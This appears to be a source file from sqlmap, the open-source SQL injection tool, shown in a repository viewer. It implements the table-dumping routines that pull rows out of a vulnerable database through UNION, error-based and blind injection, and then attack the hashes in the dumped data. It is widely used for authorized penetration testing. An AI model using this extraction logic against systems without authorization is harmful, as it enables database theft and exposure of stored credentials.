sqlmap/plugins/generic/entries.py

642 lines
30 KiB
Python
Raw Permalink Normal View History

2019-05-08 13:47:52 +03:00
#!/usr/bin/env python
2012-07-20 22:17:35 +04:00
"""
2023-01-03 01:24:59 +03:00
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
2017-10-11 15:50:46 +03:00
See the file 'LICENSE' for copying permission
2012-07-20 22:17:35 +04:00
"""
2013-01-15 19:05:33 +04:00
import re
from lib.core.agent import agent
2012-07-20 22:17:35 +04:00
from lib.core.bigarray import BigArray
from lib.core.common import Backend
from lib.core.common import clearConsoleLine
from lib.core.common import getLimitRange
from lib.core.common import getSafeExString
2012-07-20 22:17:35 +04:00
from lib.core.common import isInferenceAvailable
from lib.core.common import isListLike
from lib.core.common import isNoneValue
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import prioritySortColumns
from lib.core.common import readInput
from lib.core.common import safeSQLIdentificatorNaming
2018-02-13 17:53:50 +03:00
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
2012-07-20 22:17:35 +04:00
from lib.core.common import unArrayizeValue
from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.convert import getConsoleLength
2019-05-06 01:54:21 +03:00
from lib.core.convert import getUnicode
2012-07-20 22:17:35 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
2012-08-21 13:30:01 +04:00
from lib.core.dicts import DUMP_REPLACEMENTS
2012-07-20 22:17:35 +04:00
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
2012-07-20 22:17:35 +04:00
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
from lib.core.settings import CURRENT_DB
from lib.core.settings import METADB_SUFFIX
2012-07-20 22:17:35 +04:00
from lib.core.settings import NULL
from lib.core.settings import PLUS_ONE_DBMSES
2020-01-27 19:32:31 +03:00
from lib.core.settings import UPPER_CASE_DBMSES
2012-07-20 22:17:35 +04:00
from lib.request import inject
from lib.utils.hash import attackDumpedTable
2012-09-10 21:23:24 +04:00
from lib.utils.pivotdumptable import pivotDumpTable
from thirdparty import six
2019-05-03 00:51:54 +03:00
from thirdparty.six.moves import zip as _zip
2012-07-20 22:17:35 +04:00
2019-05-29 17:42:04 +03:00
class Entries(object):
2012-07-20 22:17:35 +04:00
"""
This class defines entries' enumeration functionalities for plugins.
"""
def __init__(self):
pass
def dumpTable(self, foundData=None):
self.forceDbmsEnum()
if conf.db is None or conf.db == CURRENT_DB:
if conf.db is None:
2012-10-04 20:28:36 +04:00
warnMsg = "missing database parameter. sqlmap is going "
2012-07-20 22:17:35 +04:00
warnMsg += "to use the current database to enumerate "
warnMsg += "table(s) entries"
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
conf.db = self.getCurrentDb()
elif conf.db is not None:
2020-01-27 19:32:31 +03:00
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
2012-07-20 22:17:35 +04:00
conf.db = conf.db.upper()
2018-02-13 17:53:50 +03:00
if ',' in conf.db:
2012-07-20 22:17:35 +04:00
errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg)
2012-07-20 22:17:35 +04:00
2019-11-04 14:53:29 +03:00
if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None:
2018-02-13 17:53:50 +03:00
infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
singleTimeLogMessage(infoMsg)
return
2021-04-13 18:55:54 +03:00
conf.db = safeSQLIdentificatorNaming(conf.db) or ""
2012-07-20 22:17:35 +04:00
if conf.tbl:
2020-01-27 19:32:31 +03:00
if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES:
2012-07-20 22:17:35 +04:00
conf.tbl = conf.tbl.upper()
2017-04-18 16:56:24 +03:00
tblList = conf.tbl.split(',')
2012-07-20 22:17:35 +04:00
else:
self.getTables()
if len(kb.data.cachedTables) > 0:
2019-05-15 11:30:47 +03:00
tblList = list(six.itervalues(kb.data.cachedTables))
2012-07-20 22:17:35 +04:00
2019-05-15 11:30:47 +03:00
if tblList and isListLike(tblList[0]):
2012-07-20 22:17:35 +04:00
tblList = tblList[0]
2021-04-13 18:55:54 +03:00
elif conf.db and not conf.search:
2012-07-20 22:17:35 +04:00
errMsg = "unable to retrieve the tables "
errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
raise SqlmapNoneDataException(errMsg)
else:
return
2012-07-20 22:17:35 +04:00
for tbl in tblList:
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
for tbl in tblList:
2018-03-13 16:40:32 +03:00
if kb.dumpKeyboardInterrupt:
break
2019-11-04 14:53:29 +03:00
if conf.exclude and re.search(conf.exclude, tbl, re.I) is not None:
2018-02-13 17:53:50 +03:00
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
singleTimeLogMessage(infoMsg)
continue
2012-07-20 22:17:35 +04:00
conf.tbl = tbl
kb.data.dumpedTable = {}
if foundData is None:
kb.data.cachedColumns = {}
self.getColumns(onlyColNames=True, dumpMode=True)
2012-07-20 22:17:35 +04:00
else:
kb.data.cachedColumns = foundData
try:
if Backend.isDbms(DBMS.INFORMIX):
kb.dumpTable = "%s:%s" % (conf.db, tbl)
elif Backend.isDbms(DBMS.SQLITE):
kb.dumpTable = tbl
else:
kb.dumpTable = "%s.%s" % (conf.db, tbl)
2012-07-20 22:17:35 +04:00
2018-09-22 00:25:25 +03:00
if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]:
warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX not in conf.db:
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
2012-07-20 22:17:35 +04:00
warnMsg += ", skipping" if len(tblList) > 1 else ""
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
continue
2013-01-15 19:05:33 +04:00
columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]
colList = sorted(column for column in columns if column)
2014-01-13 13:05:49 +04:00
2018-02-13 17:53:50 +03:00
if conf.exclude:
2019-11-04 14:53:29 +03:00
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
2014-01-13 13:05:49 +04:00
if not colList:
warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX not in conf.db:
warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
2014-01-13 13:05:49 +04:00
warnMsg += " (no usable column names)"
logger.warning(warnMsg)
2014-01-13 13:05:49 +04:00
continue
2020-05-13 14:45:52 +03:00
kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList]
2020-10-27 16:06:56 +03:00
colNames = colString = ','.join(column for column in colList)
2012-07-20 22:17:35 +04:00
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
infoMsg = "fetching entries"
if conf.col:
2013-01-15 19:05:33 +04:00
infoMsg += " of column(s) '%s'" % colNames
2012-07-20 22:17:35 +04:00
infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
if METADB_SUFFIX not in conf.db:
infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
2012-07-20 22:17:35 +04:00
logger.info(infoMsg)
2013-01-15 19:05:33 +04:00
for column in colList:
_ = agent.preprocessField(tbl, column)
if _ != column:
2020-07-28 12:22:05 +03:00
colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString)
2013-01-15 19:05:33 +04:00
2012-07-20 22:17:35 +04:00
entriesCount = 0
2012-12-05 13:45:17 +04:00
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
2012-07-20 22:17:35 +04:00
entries = []
query = None
2020-01-31 13:33:31 +03:00
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
2012-07-20 22:17:35 +04:00
query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
2012-07-20 22:17:35 +04:00
query = rootQuery.inband.query % (colString, tbl)
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
# Partial inband and error
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
2021-04-13 18:55:54 +03:00
table = "%s.%s" % (conf.db, tbl) if conf.db else tbl
2012-07-20 22:17:35 +04:00
if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:
warnMsg = "in case of table dumping problems (e.g. column entry order) "
warnMsg += "you are advised to rerun with '--force-pivoting'"
singleTimeWarnMessage(warnMsg)
2017-06-07 12:22:06 +03:00
query = rootQuery.blind.count % table
query = agent.whereQuery(query)
count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(count):
2017-06-07 17:07:27 +03:00
try:
indexRange = getLimitRange(count, plusOne=True)
for index in indexRange:
row = []
for column in colList:
query = rootQuery.blind.query3 % (column, column, table, index)
query = agent.whereQuery(query)
value = inject.getValue(query, blind=False, time=False, dump=True) or ""
row.append(value)
2019-06-26 12:31:13 +03:00
if not entries and isNoneValue(row):
break
2017-06-07 17:07:27 +03:00
entries.append(row)
except KeyboardInterrupt:
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
2017-06-07 17:07:27 +03:00
2019-06-26 12:31:13 +03:00
if isNoneValue(entries) and not kb.dumpKeyboardInterrupt:
2017-06-07 12:22:06 +03:00
try:
retVal = pivotDumpTable(table, colList, blind=False)
except KeyboardInterrupt:
retVal = None
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
2017-06-07 12:22:06 +03:00
if retVal:
entries, _ = retVal
2019-06-26 12:31:13 +03:00
entries = BigArray(_zip(*[entries[colName] for colName in colList]))
2012-07-20 22:17:35 +04:00
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
2012-07-20 22:17:35 +04:00
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
2017-01-02 17:14:59 +03:00
query = agent.whereQuery(query)
2017-06-07 17:07:27 +03:00
if not entries and query and not kb.dumpKeyboardInterrupt:
2017-03-06 14:05:58 +03:00
try:
entries = inject.getValue(query, blind=False, time=False, dump=True)
except KeyboardInterrupt:
entries = None
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
if not isNoneValue(entries):
if isinstance(entries, six.string_types):
entries = [entries]
elif not isListLike(entries):
entries = []
2012-07-20 22:17:35 +04:00
entriesCount = len(entries)
2012-07-20 22:17:35 +04:00
for index, column in enumerate(colList):
if column not in kb.data.dumpedTable:
kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()}
2012-07-20 22:17:35 +04:00
for entry in entries:
if entry is None or len(entry) == 0:
continue
2012-07-20 22:17:35 +04:00
if isinstance(entry, six.string_types):
colEntry = entry
else:
colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u''
2012-07-20 22:17:35 +04:00
maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))))
2012-07-20 22:17:35 +04:00
if maxLen > kb.data.dumpedTable[column]["length"]:
kb.data.dumpedTable[column]["length"] = maxLen
2012-07-20 22:17:35 +04:00
kb.data.dumpedTable[column]["values"].append(colEntry)
2012-07-20 22:17:35 +04:00
if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of "
if conf.col:
2013-01-15 19:05:33 +04:00
infoMsg += "column(s) '%s' " % colNames
2012-07-20 22:17:35 +04:00
infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
2020-01-31 13:33:31 +03:00
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL):
2012-07-20 22:17:35 +04:00
query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA):
2012-07-20 22:17:35 +04:00
query = rootQuery.blind.count % tbl
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
2021-04-13 18:55:54 +03:00
query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) if conf.db else tbl
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.count % (conf.db, tbl)
2012-07-20 22:17:35 +04:00
else:
query = rootQuery.blind.count % (conf.db, tbl)
2012-10-25 11:56:36 +04:00
2017-01-02 17:14:59 +03:00
query = agent.whereQuery(query)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
2012-07-20 22:17:35 +04:00
lengths = {}
entries = {}
if count == 0:
warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db)
warnMsg += "appears to be empty"
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
for column in colList:
lengths[column] = len(column)
entries[column] = []
elif not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of "
if conf.col:
2013-01-15 19:05:33 +04:00
warnMsg += "column(s) '%s' " % colNames
2012-07-20 22:17:35 +04:00
warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
continue
elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA):
if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA):
2012-07-20 22:17:35 +04:00
table = tbl
2020-02-02 16:51:24 +03:00
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL, DBMS.MAXDB):
2021-04-13 18:55:54 +03:00
table = "%s.%s" % (conf.db, tbl) if conf.db else tbl
elif Backend.isDbms(DBMS.INFORMIX):
2021-04-13 18:55:54 +03:00
table = "%s:%s" % (conf.db, tbl) if conf.db else tbl
2012-07-20 22:17:35 +04:00
if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:
warnMsg = "in case of table dumping problems (e.g. column entry order) "
warnMsg += "you are advised to rerun with '--force-pivoting'"
singleTimeWarnMessage(warnMsg)
2017-06-07 17:07:27 +03:00
try:
indexRange = getLimitRange(count, plusOne=True)
for index in indexRange:
for column in colList:
query = rootQuery.blind.query3 % (column, column, table, index)
query = agent.whereQuery(query)
2017-06-07 12:22:06 +03:00
2017-06-07 17:07:27 +03:00
value = inject.getValue(query, union=False, error=False, dump=True) or ""
2017-06-07 12:22:06 +03:00
2017-06-07 17:07:27 +03:00
if column not in lengths:
lengths[column] = 0
2017-06-07 12:22:06 +03:00
2017-06-07 17:07:27 +03:00
if column not in entries:
entries[column] = BigArray()
2017-06-07 12:22:06 +03:00
2017-06-07 17:07:27 +03:00
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
entries[column].append(value)
except KeyboardInterrupt:
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
2017-06-07 12:22:06 +03:00
2017-06-07 17:07:27 +03:00
if not entries and not kb.dumpKeyboardInterrupt:
2017-06-07 12:22:06 +03:00
try:
retVal = pivotDumpTable(table, colList, count, blind=True)
except KeyboardInterrupt:
retVal = None
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
2017-06-07 12:22:06 +03:00
if retVal:
entries, lengths = retVal
2012-07-20 22:17:35 +04:00
else:
emptyColumns = []
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne)
2012-07-20 22:17:35 +04:00
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
2016-05-16 18:09:05 +03:00
debugMsg = "checking for empty columns"
logger.debug(infoMsg)
2012-07-20 22:17:35 +04:00
for column in colList:
2016-05-16 18:09:05 +03:00
if not inject.checkBooleanExpression("(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)):
2012-07-20 22:17:35 +04:00
emptyColumns.append(column)
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg)
try:
for index in indexRange:
for column in colList:
value = ""
if column not in lengths:
lengths[column] = 0
if column not in entries:
entries[column] = BigArray()
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE):
2013-01-15 19:05:33 +04:00
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
2020-01-31 13:33:31 +03:00
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
2020-01-31 13:33:31 +03:00
elif Backend.getIdentifiedDbms() in (DBMS.MIMERSQL,):
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), sorted(colList, key=len)[0], index)
2020-02-26 19:33:47 +03:00
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.EXTREMEDB):
2013-01-15 19:05:33 +04:00
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index)
2012-07-20 22:17:35 +04:00
elif Backend.isDbms(DBMS.FIREBIRD):
2013-01-15 19:05:33 +04:00
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl)
2021-02-15 16:07:04 +03:00
elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0])
2020-03-02 14:43:12 +03:00
elif Backend.isDbms(DBMS.FRONTBASE):
query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl)
2020-02-02 16:51:24 +03:00
else:
2020-01-17 19:14:41 +03:00
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index)
2012-07-20 22:17:35 +04:00
2017-01-02 17:14:59 +03:00
query = agent.whereQuery(query)
value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
value = '' if value is None else value
2012-07-20 22:17:35 +04:00
2016-05-30 13:03:33 +03:00
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
2012-07-20 22:17:35 +04:00
entries[column].append(value)
except KeyboardInterrupt:
2016-03-23 12:33:32 +03:00
kb.dumpKeyboardInterrupt = True
2012-07-20 22:17:35 +04:00
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
for column, columnEntries in entries.items():
length = max(lengths[column], len(column))
kb.data.dumpedTable[column] = {"length": length, "values": columnEntries}
entriesCount = len(columnEntries)
if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag):
warnMsg = "unable to retrieve the entries "
if conf.col:
2013-01-15 19:05:33 +04:00
warnMsg += "of columns '%s' " % colNames
2012-07-20 22:17:35 +04:00
warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "")
logger.warning(warnMsg)
2012-07-20 22:17:35 +04:00
else:
kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
"table": safeSQLIdentificatorNaming(tbl, True),
"db": safeSQLIdentificatorNaming(conf.db)}
2014-11-08 23:54:34 +03:00
try:
attackDumpedTable()
2019-01-22 02:40:48 +03:00
except (IOError, OSError) as ex:
2014-11-08 23:54:34 +03:00
errMsg = "an error occurred while attacking "
errMsg += "table dump ('%s')" % getSafeExString(ex)
2014-11-08 23:54:34 +03:00
logger.critical(errMsg)
2012-07-20 22:17:35 +04:00
conf.dumper.dbTableValues(kb.data.dumpedTable)
2019-01-22 02:40:48 +03:00
except SqlmapConnectionException as ex:
2014-11-08 23:54:34 +03:00
errMsg = "connection exception detected in dumping phase "
errMsg += "('%s')" % getSafeExString(ex)
2012-07-20 22:17:35 +04:00
logger.critical(errMsg)
finally:
2016-07-15 00:18:28 +03:00
kb.dumpColumns = None
2012-07-20 22:17:35 +04:00
kb.dumpTable = None
def dumpAll(self):
if conf.db is not None and conf.tbl is None:
self.dumpTable()
return
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
errMsg = "information_schema not available, "
errMsg += "back-end DBMS is MySQL < 5.0"
raise SqlmapUnsupportedFeatureException(errMsg)
2012-07-20 22:17:35 +04:00
infoMsg = "sqlmap will dump entries of all tables from all databases now"
logger.info(infoMsg)
conf.tbl = None
conf.col = None
self.getTables()
if kb.data.cachedTables:
if isinstance(kb.data.cachedTables, list):
kb.data.cachedTables = {None: kb.data.cachedTables}
2012-07-20 22:17:35 +04:00
for db, tables in kb.data.cachedTables.items():
conf.db = db
for table in tables:
2019-11-04 14:53:29 +03:00
if conf.exclude and re.search(conf.exclude, table, re.I) is not None:
2018-02-13 17:53:50 +03:00
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
logger.info(infoMsg)
continue
2012-07-20 22:17:35 +04:00
try:
conf.tbl = table
kb.data.cachedColumns = {}
kb.data.dumpedTable = {}
self.dumpTable()
except SqlmapNoneDataException:
2013-02-15 19:48:58 +04:00
infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table)
2012-07-20 22:17:35 +04:00
logger.info(infoMsg)
def dumpFoundColumn(self, dbs, foundCols, colConsider):
2019-11-01 01:04:26 +03:00
message = "do you want to dump found column(s) entries? [Y/n] "
2012-07-20 22:17:35 +04:00
2017-04-18 16:48:05 +03:00
if not readInput(message, default='Y', boolean=True):
2012-07-20 22:17:35 +04:00
return
dumpFromDbs = []
message = "which database(s)?\n[a]ll (default)\n"
for db, tblData in dbs.items():
if tblData:
2013-02-15 19:48:58 +04:00
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db)
2012-07-20 22:17:35 +04:00
message += "[q]uit"
2017-04-18 16:48:05 +03:00
choice = readInput(message, default='a')
2012-07-20 22:17:35 +04:00
2017-04-18 16:48:05 +03:00
if not choice or choice in ('a', 'A'):
dumpFromDbs = list(dbs.keys())
2017-04-18 16:48:05 +03:00
elif choice in ('q', 'Q'):
2012-07-20 22:17:35 +04:00
return
else:
2017-04-18 16:56:24 +03:00
dumpFromDbs = choice.replace(" ", "").split(',')
2012-07-20 22:17:35 +04:00
for db, tblData in dbs.items():
if db not in dumpFromDbs or not tblData:
continue
conf.db = db
dumpFromTbls = []
2013-02-15 19:58:02 +04:00
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db)
2012-07-20 22:17:35 +04:00
message += "[a]ll (default)\n"
for tbl in tblData:
message += "[%s]\n" % tbl
message += "[s]kip\n"
message += "[q]uit"
2017-04-18 16:48:05 +03:00
choice = readInput(message, default='a')
2012-07-20 22:17:35 +04:00
2017-04-18 16:48:05 +03:00
if not choice or choice in ('a', 'A'):
2012-07-20 22:17:35 +04:00
dumpFromTbls = tblData
2017-04-18 16:48:05 +03:00
elif choice in ('s', 'S'):
2012-07-20 22:17:35 +04:00
continue
2017-04-18 16:48:05 +03:00
elif choice in ('q', 'Q'):
2012-07-20 22:17:35 +04:00
return
else:
2017-04-18 16:56:24 +03:00
dumpFromTbls = choice.replace(" ", "").split(',')
2012-07-20 22:17:35 +04:00
for table, columns in tblData.items():
if table not in dumpFromTbls:
continue
conf.tbl = table
2019-01-22 15:06:13 +03:00
colList = [_ for _ in columns if _]
2014-01-13 13:05:49 +04:00
2018-02-13 17:53:50 +03:00
if conf.exclude:
2019-11-04 14:53:29 +03:00
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
2014-01-13 13:05:49 +04:00
2017-04-18 16:48:05 +03:00
conf.col = ','.join(colList)
2012-07-20 22:17:35 +04:00
kb.data.cachedColumns = {}
kb.data.dumpedTable = {}
data = self.dumpTable(dbs)
if data:
conf.dumper.dbTableValues(data)
def dumpFoundTables(self, tables):
2019-11-01 01:04:26 +03:00
message = "do you want to dump found table(s) entries? [Y/n] "
2017-04-18 16:48:05 +03:00
if not readInput(message, default='Y', boolean=True):
return
dumpFromDbs = []
message = "which database(s)?\n[a]ll (default)\n"
for db, tablesList in tables.items():
if tablesList:
2013-02-15 19:48:58 +04:00
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db)
message += "[q]uit"
2017-04-18 16:48:05 +03:00
choice = readInput(message, default='a')
2017-04-18 16:48:05 +03:00
if not choice or choice.lower() == 'a':
dumpFromDbs = list(tables.keys())
2017-04-18 16:48:05 +03:00
elif choice.lower() == 'q':
return
else:
2017-04-18 16:48:05 +03:00
dumpFromDbs = choice.replace(" ", "").split(',')
for db, tablesList in tables.items():
if db not in dumpFromDbs or not tablesList:
continue
conf.db = db
dumpFromTbls = []
2013-02-15 19:48:58 +04:00
message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db)
message += "[a]ll (default)\n"
for tbl in tablesList:
2013-02-15 19:48:58 +04:00
message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl)
message += "[s]kip\n"
message += "[q]uit"
2017-04-18 16:48:05 +03:00
choice = readInput(message, default='a')
2017-04-18 16:48:05 +03:00
if not choice or choice.lower() == 'a':
dumpFromTbls = tablesList
2017-04-18 16:48:05 +03:00
elif choice.lower() == 's':
continue
2017-04-18 16:48:05 +03:00
elif choice.lower() == 'q':
return
else:
2017-04-18 16:48:05 +03:00
dumpFromTbls = choice.replace(" ", "").split(',')
for table in dumpFromTbls:
conf.tbl = table
kb.data.cachedColumns = {}
kb.data.dumpedTable = {}
data = self.dumpTable()
if data:
conf.dumper.dbTableValues(data)